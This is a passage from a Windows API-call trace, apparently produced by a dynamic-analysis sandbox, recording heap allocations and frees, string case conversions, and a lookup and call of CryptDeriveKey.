Flags=0x0, Size=0x10) returned 0x2e51bc8 [0267.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551c8 [0267.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0267.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0267.429] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0267.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0267.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51d78 [0267.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0267.429] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0267.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55158 [0267.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0267.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0267.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0267.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0267.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0267.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0267.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0267.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55288 [0267.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0267.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0267.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0267.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551c8 [0267.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0267.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0267.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0267.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55138 [0267.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0267.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0267.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0267.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0267.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0267.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55268 [0267.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0267.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0267.430] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0267.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0267.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0267.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51e38 [0267.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0267.431] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0267.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55128 [0267.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55178 [0267.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0267.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0267.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0267.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0267.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0267.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0267.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55278 [0267.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0267.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0267.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0267.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552b8 [0267.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0267.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0267.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55188 [0267.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0267.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0267.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0267.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0267.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0267.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552b8 [0267.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0267.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0267.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55308 [0267.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0267.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0267.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0267.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0267.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0267.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0267.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55208 [0267.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0267.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0267.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0267.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552c8 [0267.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0267.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0267.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0267.432] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0267.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0267.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0267.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0267.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0267.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0267.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0267.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0267.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0267.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0267.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0267.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0267.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0267.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0267.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0267.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0267.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0267.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0267.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0267.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0267.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0267.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0267.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0267.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0267.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0267.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0267.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0267.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0267.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0267.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0267.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0267.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0267.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0267.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0267.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0267.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0267.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55148 [0267.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0267.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0267.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0267.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0267.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0267.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0267.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0267.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0267.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0267.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0267.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0267.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0267.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0267.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0267.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0267.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0267.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0267.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0267.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0267.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0267.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0267.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0267.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51da8 [0267.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51da8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0267.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0267.435] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0267.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0267.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0267.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0267.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0267.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0267.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0267.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0267.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0267.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0267.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0267.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0267.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0267.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0267.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0267.443] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87710, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87350) returned 1 [0267.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f146b0 [0267.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0267.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0267.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0267.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0267.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0267.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0267.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0267.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0267.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0267.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0267.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0267.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0267.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0267.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0267.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0267.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0267.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0267.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0267.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0267.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0267.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0267.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0267.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0267.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0267.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0267.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520c0 [0267.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0267.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520c0 | out: hHeap=0x970000) returned 1 [0267.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0267.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0267.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0267.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520d8 [0267.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f88 [0267.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0267.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f88 | out: hHeap=0x970000) returned 1 [0267.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0267.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520d8 | out: hHeap=0x970000) returned 1 [0267.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52090 [0267.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f10 [0267.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52138 [0267.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0267.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52138 | out: hHeap=0x970000) returned 1 [0267.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0267.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f10 | out: hHeap=0x970000) returned 1 [0267.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0267.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0267.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0267.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0267.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0267.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0267.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0267.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0267.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0267.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0267.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0267.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0267.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0267.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0267.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0267.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0267.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0267.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0267.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0267.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0267.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0267.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0267.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0267.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0267.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0267.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0267.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0267.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0267.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0267.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0267.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0267.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0267.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0267.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0267.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0267.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0267.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0267.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0267.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0267.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0267.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0267.446] 